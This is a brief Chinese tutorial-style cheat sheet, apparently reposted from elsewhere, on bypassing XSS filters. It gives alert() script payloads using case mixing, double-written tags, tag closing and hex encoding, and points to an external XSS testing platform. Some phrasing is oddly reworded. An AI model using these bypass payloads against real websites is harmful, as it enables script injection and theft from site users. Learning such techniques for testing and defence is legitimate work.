大小写绕过也不行
<ScRipt>ALeRt(“XSS”);</sCRipT>
双写绕过可以
<scscriptript>alert('z')</scscriptript>
改变大小写
在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则:
比如:<script>alert(“xss”);</script>可以转换为:
<ScRipt>ALeRt(“XSS”);</sCRipT>
关闭标签
偶然间我们必要关闭标签来使我们的XSS见效。
比如:“><script>alert(“Hi”);</script>
使用hex编码绕过
我们可以对我们的语句举行hex编码来绕过XSS规则
比如:<script>alert(“xss”);</script>可以转换为:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%78%73%73%22%29%3b%3c%2f%73%63%72%69%70%74%3e
以是确定了过滤方式之后,找个xss平台(https://xssaq.com)测试一下:
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
